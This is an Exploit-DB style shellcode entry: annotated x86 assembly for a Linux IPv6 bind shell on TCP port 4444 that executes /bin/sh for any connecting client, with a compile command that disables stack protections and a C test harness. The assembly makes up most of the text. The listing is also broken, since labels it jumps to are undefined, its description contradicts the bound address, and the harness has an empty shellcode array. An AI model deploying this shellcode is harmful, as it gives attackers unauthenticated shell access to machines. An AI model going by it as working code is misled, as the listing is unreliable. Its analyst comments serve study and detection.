Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)

EDB-ID: 44723
Author: Matteo Malvica
Published: 2018-05-23
Type: Shellcode
Platform: Linux_x86
Shellcode Size: 113 bytes

 // # Length : 113 bytes 
// # Author : Matteo Malvica
// # Tested On : kali linux 4.15
// # Contact : [email protected]
// # Description: it creates an IPv6 socket on localhost ::1 and listens on port 4444


global _start
section .text

;-----------------------------------------------------------------------
; Linux/x86 IPv6 bind shell (NASM, Intel syntax; Linux i386 int 0x80 ABI:
; eax = syscall nr, ebx/ecx/edx = args).
; Every network call is made through sys_socketcall (eax = 0x66) with the
; sub-call number in ebx and ecx pointing at an argument array on the stack.
; Syscall order as listed: socket -> bind -> listen -> accept -> dup2 x3
; -> execve("/bin//sh").  For analysts this is the canonical bind-shell
; sequence: socketcall(SYS_ACCEPT), then dup2 of the accepted fd onto 0/1/2,
; then execve of a shell is a strong detection signal, and the listener is
; visible as TCP [::]:4444 in LISTEN state (see the sockaddr note below).
; NOTE(review): `_start` is declared global but no `_start:` label appears
; in this listing, and `jns loop2` below references a label that is not
; defined here either.
;-----------------------------------------------------------------------

;; ipv6 socket creation: socket(AF_INET6, SOCK_STREAM, 6)
push 0x6 ; protocol = 6 = IPPROTO_TCP (not "IPv6": the family is the 0xa below)
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0xa ; AF_INET6 (10)
xor eax,eax ; zero out eax
xor ebx,ebx ; zero out ebx
mov al,0x66 ; syscall: sys_socketcall (eax = 0x66)
inc ebx ; 1 = SYS_SOCKET sub-call
mov ecx,esp ; ecx -> {AF_INET6, SOCK_STREAM, 6} on the stack
int 0x80
mov esi,eax ; esi = listening socket fd; kept live across every later call
xor eax,eax

;; build struct sockaddr_in6 on the stack, last field first
;; (family:2, port:2, flowinfo:4, addr:16, scope_id:4 = 28 bytes)
push DWORD eax ; sin6_addr[12..15]  -- these four zero dwords are sin6_addr = :: (in6addr_any,
push DWORD eax ; sin6_addr[8..11]      i.e. all interfaces), not the loopback ::1 the
push DWORD eax ; sin6_addr[4..7]       description claims
push DWORD eax ; sin6_addr[0..3]
push DWORD eax ; sin6_flowinfo = 0 (the original comment labelled this sin6_addr)
push WORD 0x5c11 ; sin6_port = htons(4444): bytes 0x11 0x5c in memory
push WORD 0x0a ; sin6_family = AF_INET6
mov ecx,esp ; ecx -> sockaddr_in6
push 0x1c ; addrlen = 28 = sizeof(sockaddr_in6); only 24 bytes were pushed, so the kernel
          ; reads sin6_scope_id from the dword above the struct (the 0xa pushed for socket())
push ecx ; &sockaddr_in6
push esi ; sockfd
dec ebx ; ebx: 1 -> 0
mov bl,0x2 ; 2 = SYS_BIND sub-call
mov ecx,esp ; ecx -> {sockfd, &addr, 28}
mov al,0x66 ; sys_socketcall (eax upper bytes still 0 from the xor above)
int 80h ; bind()

;; listen(sockfd, 2)
xor eax,eax
xor ebx,ebx
push byte 0x2 ; backlog = 2
push esi ; sockfd
mov ecx,esp ; ecx -> {sockfd, 2}
mov bl,0x4 ; 4 = SYS_LISTEN sub-call
mov al,0x66 ; sys_socketcall
int 80h ; listen()

;; accept(sockfd, NULL, NULL) - blocks until a client connects
xor ebx,ebx
push ebx ; addrlen = NULL
push ebx ; addr = NULL
push esi ; sockfd
mul ebx ; eax = edx = 0 (ebx is 0): zeroes eax without a separate xor
mov bl,0x5 ; 5 = SYS_ACCEPT sub-call
mov al,0x66 ; sys_socketcall
mov ecx,esp ; ecx -> {sockfd, NULL, NULL}
int 80h ; accept(); eax = connected client fd

sub ecx, ecx ; ecx = 0
mov cl, 0x2 ;initiate counter: ecx = 2 = highest fd to redirect (stderr)
xchg ebx,eax ;save clientfd in ebx (dup2 oldfd); eax now holds the old ebx (5) and is overwritten below

; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2)
; NOTE(review): the `loop2` target of the jns below is presumably meant to be this line;
; it is not defined anywhere in the listing as given.
mov al, 0x3f ;syscall: sys_dup2 (eax = 0x3f); only al is set, so this relies on eax's upper
             ;bytes being 0 (true here: eax is 5 from the xchg, then the small fd dup2 returns)
int 0x80 ;exec sys_dup2: dup2(clientfd, ecx)
dec ecx ;decrement loop-counter: 2 -> 1 -> 0 -> -1
jns loop2 ;as long as SF is not set -> jmp to loop; falls through once ecx is -1

;; execve("/bin//sh", {"/bin//sh", NULL}, NULL)
xor edx,edx ; edx = 0: used as the string terminator, argv[1] and envp
push edx ;null terminated /bin//sh
push 0x68732f2f ;"hs//" -> "//sh" in memory (little-endian)
push 0x6e69622f ;"nib/" -> "/bin" in memory
mov ebx,esp ; ebx -> "/bin//sh" (filename)
push edx ; argv[1] = NULL
push ebx ; argv[0] -> "/bin//sh"
mov ecx,esp ; ecx -> argv
mov al,0x0b ;execve() (eax = 0x0b); eax upper bytes are 0 from the last dup2 return (fd 0)
int 0x80


To compile the shellcode (wrapped in the C harness below):

$gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode


#include <stdio.h>

unsigned char shellcode[] = \

printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
